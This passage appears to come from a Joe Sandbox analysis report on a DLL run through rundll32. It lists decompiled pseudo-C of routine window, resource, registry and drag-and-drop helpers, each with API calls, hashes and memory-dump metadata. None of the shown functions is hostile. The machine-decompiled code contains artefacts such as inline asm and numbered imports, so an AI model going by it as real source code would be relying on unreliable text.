                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: OffsetRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 177026234-0
                                                                                                            • Opcode ID: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                                                            • Instruction ID: 422a5061f760cbc8c05fd093b4a9fb31e1b7e654ec4c61e66631bb08b1bca8e5
                                                                                                            • Opcode Fuzzy Hash: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                                                            • Instruction Fuzzy Hash: 3D110CB6600608BFD711DFEDC994DABB7ECEF48210F00882AF54AD7610E670FA408B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1001EFFC(void* __ecx) {
                                                                                                            				void* _v8;
                                                                                                            				signed short _t23;
                                                                                                            				void* _t30;
                                                                                                            				struct HINSTANCE__* _t32;
                                                                                                            				signed short _t34;
                                                                                                            				void* _t36;
                                                                                                            				signed short* _t39;
                                                                                                            				signed short _t41;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t36 = __ecx;
                                                                                                            				_t39 =  *(__ecx + 0x5c);
                                                                                                            				_v8 =  *((intOrPtr*)(__ecx + 0x58));
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x54)) != 0) {
                                                                                                            					_t32 =  *(E100373B5() + 0xc);
                                                                                                            					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t36 + 0x54), 5));
                                                                                                            				}
                                                                                                            				if(_v8 != 0) {
                                                                                                            					_t39 = LockResource(_v8);
                                                                                                            				}
                                                                                                            				_t30 = 1;
                                                                                                            				if(_t39 != 0) {
                                                                                                            					_t34 =  *_t39;
                                                                                                            					if(_t39[1] != 0xffff) {
                                                                                                            						_t23 = _t39[5];
                                                                                                            						_t41 = _t39[6];
                                                                                                            					} else {
                                                                                                            						_t34 = _t39[6];
                                                                                                            						_t23 = _t39[9];
                                                                                                            						_t41 = _t39[0xa];
                                                                                                            					}
                                                                                                            					if((_t34 & 0x00001801) != 0 || _t23 != 0 || _t41 != 0) {
                                                                                                            						_t30 = 0;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if( *(_t36 + 0x54) != 0) {
                                                                                                            					FreeResource(_v8);
                                                                                                            				}
                                                                                                            				return _t30;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F022
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 1001F02A
                                                                                                            • LockResource.KERNEL32(00000000), ref: 1001F03C
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1001F086
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                                                            • Instruction ID: f62bb37731aceb1cfac18bd5f8f11ebe971a113ae325be4be6212f910cba7098
                                                                                                            • Opcode Fuzzy Hash: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                                                            • Instruction Fuzzy Hash: 8711E73A500715EFD722EFA1C988AABB7B4FF18794F00815CE8429B652D770EC84CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1001D8A6(void* __ecx, struct tagPOINT* _a8) {
                                                                                                            				struct tagPOINT _v12;
                                                                                                            				struct tagPOINT* _t8;
                                                                                                            				struct HWND__* _t9;
                                                                                                            				int _t14;
                                                                                                            				long _t18;
                                                                                                            				struct HWND__* _t20;
                                                                                                            				struct HWND__* _t21;
                                                                                                            				struct HWND__* _t24;
                                                                                                            
                                                                                                            				_t8 = _a8;
                                                                                                            				_v12.x = _t8->x;
                                                                                                            				_t18 = _t8->y;
                                                                                                            				_push(_t18);
                                                                                                            				_v12.y = _t18;
                                                                                                            				_t9 = WindowFromPoint( *_t8);
                                                                                                            				_t24 = _t9;
                                                                                                            				if(_t24 != 0) {
                                                                                                            					_t20 = GetParent(_t24);
                                                                                                            					if(_t20 == 0 || E10029A8E(_t20, 2) == 0) {
                                                                                                            						ScreenToClient(_t24,  &_v12);
                                                                                                            						_t21 = E10029C98(_t24, _v12.x, _v12.y);
                                                                                                            						if(_t21 == 0) {
                                                                                                            							L6:
                                                                                                            							_t9 = _t24;
                                                                                                            						} else {
                                                                                                            							_t14 = IsWindowEnabled(_t21);
                                                                                                            							_t9 = _t21;
                                                                                                            							if(_t14 != 0) {
                                                                                                            								goto L6;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t9 = _t20;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t9;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • WindowFromPoint.USER32(?,?), ref: 1001D8BD
                                                                                                            • GetParent.USER32(00000000), ref: 1001D8CB
                                                                                                            • ScreenToClient.USER32 ref: 1001D8EC
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 1001D905
                                                                                                              • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientEnabledFromLongParentPointScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2204725058-0
                                                                                                            • Opcode ID: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                                                            • Instruction ID: b169f4ebd7b1781a2425983f4991e3855304b76673034f1eafd2744fb62dc6a9
                                                                                                            • Opcode Fuzzy Hash: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                                                            • Instruction Fuzzy Hash: D3014F3A600615BFDB12FB59CC44DAE7BB9EF89690B11416AF901DB211EB30DE40DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 62%
                                                                                                            			E10022B16(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                            				void* __ebp;
                                                                                                            				struct HWND__* _t16;
                                                                                                            				void* _t20;
                                                                                                            				struct HWND__* _t23;
                                                                                                            
                                                                                                            				_t16 = GetTopWindow(_a4);
                                                                                                            				while(1) {
                                                                                                            					_t23 = _t16;
                                                                                                            					if(_t23 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					if(_a24 == 0) {
                                                                                                            						SendMessageA(_t23, _a8, _a12, _a16);
                                                                                                            					} else {
                                                                                                            						_push(_t23);
                                                                                                            						_t20 = E10022115();
                                                                                                            						if(_t20 != 0) {
                                                                                                            							_push(_a16);
                                                                                                            							_push(_a12);
                                                                                                            							_push(_a8);
                                                                                                            							_push( *((intOrPtr*)(_t20 + 0x1c)));
                                                                                                            							_push(_t20);
                                                                                                            							E1002283F();
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_a20 != 0 && GetTopWindow(_t23) != 0) {
                                                                                                            						E10022B16(_t23, _a8, _a12, _a16, _a20, _a24);
                                                                                                            					}
                                                                                                            					_t16 = GetWindow(_t23, 2);
                                                                                                            				}
                                                                                                            				return _t16;
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • GetTopWindow.USER32(?), ref: 10022B24
                                                                                                            • GetTopWindow.USER32(00000000), ref: 10022B63
                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 10022B81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window
                                                                                                            • String ID:
                                                                                                            • API String ID: 2353593579-0
                                                                                                            • Opcode ID: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                                                            • Instruction ID: 59ebec99428bed81cbae9e399db4f0855efa5802a24bdab8832a78d2f0a6533d
                                                                                                            • Opcode Fuzzy Hash: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                                                            • Instruction Fuzzy Hash: FC01A93600151ABBDF13AFE1AC05EDF3B6AEF45391F814011FA1455062C736D971EBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10022422(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                            				void* __ebp;
                                                                                                            				struct HWND__* _t10;
                                                                                                            				void* _t13;
                                                                                                            				struct HWND__* _t15;
                                                                                                            				struct HWND__* _t16;
                                                                                                            				void* _t17;
                                                                                                            
                                                                                                            				_t13 = __ecx;
                                                                                                            				_t15 = GetDlgItem(_a4, _a8);
                                                                                                            				if(_t15 == 0) {
                                                                                                            					L6:
                                                                                                            					_t10 = GetTopWindow(_a4);
                                                                                                            					while(1) {
                                                                                                            						_t16 = _t10;
                                                                                                            						if(_t16 == 0) {
                                                                                                            							goto L10;
                                                                                                            						}
                                                                                                            						_t10 = E10022422(_t13, _t16, _a8, _a12);
                                                                                                            						if(_t10 == 0) {
                                                                                                            							_t10 = GetWindow(_t16, 2);
                                                                                                            							continue;
                                                                                                            						}
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					if(GetTopWindow(_t15) == 0) {
                                                                                                            						L3:
                                                                                                            						_push(_t15);
                                                                                                            						if(_a12 == 0) {
                                                                                                            							return E100220EE(_t17);
                                                                                                            						}
                                                                                                            						_t10 = E10022115();
                                                                                                            						if(_t10 == 0) {
                                                                                                            							goto L6;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t10 = E10022422(_t13, _t15, _a8, _a12);
                                                                                                            						if(_t10 == 0) {
                                                                                                            							goto L3;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L10:
                                                                                                            				return _t10;
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 1002242D
                                                                                                            • GetTopWindow.USER32(00000000), ref: 10022440
                                                                                                              • Part of subcall function 10022422: GetWindow.USER32(00000000,00000002), ref: 10022487
                                                                                                            • GetTopWindow.USER32(?), ref: 10022470
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item
                                                                                                            • String ID:
                                                                                                            • API String ID: 369458955-0
                                                                                                            • Opcode ID: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                                                            • Instruction ID: cbb5f4ea75b5981124a7b3c1720515b8597a7f038d3602274fac482962cbe2a9
                                                                                                            • Opcode Fuzzy Hash: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                                                            • Instruction Fuzzy Hash: A701623650166BBBDB23BFE2BC00E9F3B99EF462E4F828121FD0499111D731D9629691
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002B47F(void* __ecx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, char _a12) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v24;
                                                                                                            				intOrPtr _t15;
                                                                                                            				long _t22;
                                                                                                            				void* _t31;
                                                                                                            				void* _t32;
                                                                                                            
                                                                                                            				_t15 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_t31 = __ecx;
                                                                                                            				_v8 = _t15;
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
                                                                                                            					wsprintfA( &_v24, 0x1003cc28, _a12);
                                                                                                            					_t19 = WritePrivateProfileStringA(_a4, _a8,  &_v24,  *(_t31 + 0x64));
                                                                                                            				} else {
                                                                                                            					_t32 = E10035959(__ecx, _a4);
                                                                                                            					if(_t32 != 0) {
                                                                                                            						_t22 = RegSetValueExA(_t32, _a8, 0, 4,  &_a12, 4);
                                                                                                            						RegCloseKey(_t32);
                                                                                                            						_t19 = 0 | _t22 == 0x00000000;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E100117AE(_t19, _v8);
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 1002B4B3
                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,?), ref: 1002B4BC
                                                                                                            • wsprintfA.USER32 ref: 1002B4D8
                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B4EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1902064621-0
                                                                                                            • Opcode ID: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                                                            • Instruction ID: 9a6bc9ffc77bb201adb5d4a8a8e7071db867b7f7a5a0f8b8952f6efe61c2a51a
                                                                                                            • Opcode Fuzzy Hash: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                                                            • Instruction Fuzzy Hash: A001403250161AEFDB02EFA5CD45E9E3BB8FF44754F044415FA04EB152DB71DA118B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10031D85(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v268;
                                                                                                            				int _v272;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t14;
                                                                                                            				int _t24;
                                                                                                            				intOrPtr* _t30;
                                                                                                            				void* _t33;
                                                                                                            
                                                                                                            				_t14 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_v8 = _t14;
                                                                                                            				E100220EE(_t33, SetActiveWindow( *(__ecx + 0x1c)));
                                                                                                            				_t24 = 0;
                                                                                                            				_v272 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
                                                                                                            				_t30 =  *((intOrPtr*)(E100373B5() + 4));
                                                                                                            				if(_v272 > 0) {
                                                                                                            					do {
                                                                                                            						DragQueryFileA(_a4, _t24,  &_v268, 0x104);
                                                                                                            						_t18 =  *((intOrPtr*)( *_t30 + 0x88))( &_v268);
                                                                                                            						_t24 = _t24 + 1;
                                                                                                            					} while (_t24 < _v272);
                                                                                                            				}
                                                                                                            				DragFinish(_a4);
                                                                                                            				return E100117AE(_t18, _v8);
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • SetActiveWindow.USER32(?), ref: 10031D9C
                                                                                                            • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 10031DB7
                                                                                                            • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 10031DDF
                                                                                                            • DragFinish.SHELL32(?), ref: 10031DFE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 892977027-0
                                                                                                            • Opcode ID: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
                                                                                                            • Instruction ID: f3efa9f330312ec6ab61e1b0fbe20e019f1dfd30d235b1af0ecd9192f479495c
                                                                                                            • Opcode Fuzzy Hash: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
                                                                                                            • Instruction Fuzzy Hash: A2016975900228AFDB11DF64CC84DE97BB8EF49354F0081AAF5859B151CA70AE81CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100368F3(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
                                                                                                            				signed short _t21;
                                                                                                            				void* _t37;
                                                                                                            
                                                                                                            				_t37 = __ecx;
                                                                                                            				if(IsWindow( *(__ecx + 0x1c)) == 0) {
                                                                                                            					 *(_t37 + 0xa8) = _a4;
                                                                                                            					 *(_t37 + 0xac) = _a8;
                                                                                                            					 *(_t37 + 0xa0) = _a12;
                                                                                                            					_t21 = _a16;
                                                                                                            					 *(_t37 + 0xa4) = _t21;
                                                                                                            					return _t21;
                                                                                                            				}
                                                                                                            				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                                                                                                            				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
                                                                                                            				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
                                                                                                            			}






                                                                                                            APIs
                                                                                                            • IsWindow.USER32(?), ref: 100368FC
                                                                                                            • SendMessageA.USER32(?,00000420,00000000,?), ref: 10036925
                                                                                                            • SendMessageA.USER32(?,0000041F,00000000,?), ref: 1003693F
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 10036948
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$InvalidateRectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3225880595-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 37%
                                                                                                            			E10036FD8(short* _a4) {
                                                                                                            				char* _v0;
                                                                                                            				int _v8;
                                                                                                            				char* _v16;
                                                                                                            				int _t6;
                                                                                                            				char* _t7;
                                                                                                            				short* _t11;
                                                                                                            				void* _t12;
                                                                                                            				void* _t16;
                                                                                                            				int _t17;
                                                                                                            
                                                                                                            				_t11 = _a4;
                                                                                                            				if(_t11 != 0) {
                                                                                                            					__imp__#7(_t11, _t12, _t16);
                                                                                                            					_t17 = _t6;
                                                                                                            					_t7 = WideCharToMultiByte(0, 0, _t11, _t17, 0, 0, 0, 0);
                                                                                                            					_v0 = _t7;
                                                                                                            					__imp__#150(0, _t7);
                                                                                                            					_v16 = _t7;
                                                                                                            					WideCharToMultiByte(0, 0, _t11, _t17, _t7, _v8, 0, 0);
                                                                                                            					return _v16;
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • SysStringLen.OLEAUT32(?), ref: 10036FEC
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,10039361,00000000), ref: 10037002
                                                                                                            • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1003700A
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,10039361,00000000), ref: 1003701F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3384502665-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10036B96(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				char _v16;
                                                                                                            				int _t12;
                                                                                                            				signed int _t16;
                                                                                                            				int _t18;
                                                                                                            				intOrPtr _t19;
                                                                                                            				void* _t24;
                                                                                                            				intOrPtr* _t27;
                                                                                                            
                                                                                                            				_t19 = _a4;
                                                                                                            				_t27 = __ecx;
                                                                                                            				E1002F372(__ecx, _t19, _a8);
                                                                                                            				_t12 = E100202AB(__ecx);
                                                                                                            				if((_t12 & 0x00000001) != 0) {
                                                                                                            					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
                                                                                                            					if(_t12 == 0) {
                                                                                                            						 *((intOrPtr*)( *_t27 + 0x110))(0x407, 0,  &_v16, _t24);
                                                                                                            						_t16 = GetSystemMetrics(5);
                                                                                                            						_t18 = GetSystemMetrics(2);
                                                                                                            						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
                                                                                                            						return _t18;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t12;
                                                                                                            			}











                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • GetParent.USER32(?), ref: 10036BBB
                                                                                                            • IsZoomed.USER32(00000000), ref: 10036BC2
                                                                                                            • GetSystemMetrics.USER32 ref: 10036BEA
                                                                                                            • GetSystemMetrics.USER32 ref: 10036BF8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystem$LongParentWindowZoomed
                                                                                                            • String ID:
                                                                                                            • API String ID: 3909876373-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 54%
                                                                                                            			E1000BFC5(intOrPtr _a4, RECT* _a8, int _a12) {
                                                                                                            				struct tagRECT _v20;
                                                                                                            				intOrPtr _t28;
                                                                                                            
                                                                                                            				_t28 = _a4;
                                                                                                            				if(_a8 != 0) {
                                                                                                            					IntersectRect( &_v20, _a8, _t28 - 0x9c);
                                                                                                            					EqualRect( &_v20, _a8);
                                                                                                            				} else {
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            				}
                                                                                                            				if(IsRectEmpty( &_v20) == 0) {
                                                                                                            					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t28 - 0xac)) + 0x1c)) + 0x1c),  &_v20, _a12);
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}






                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
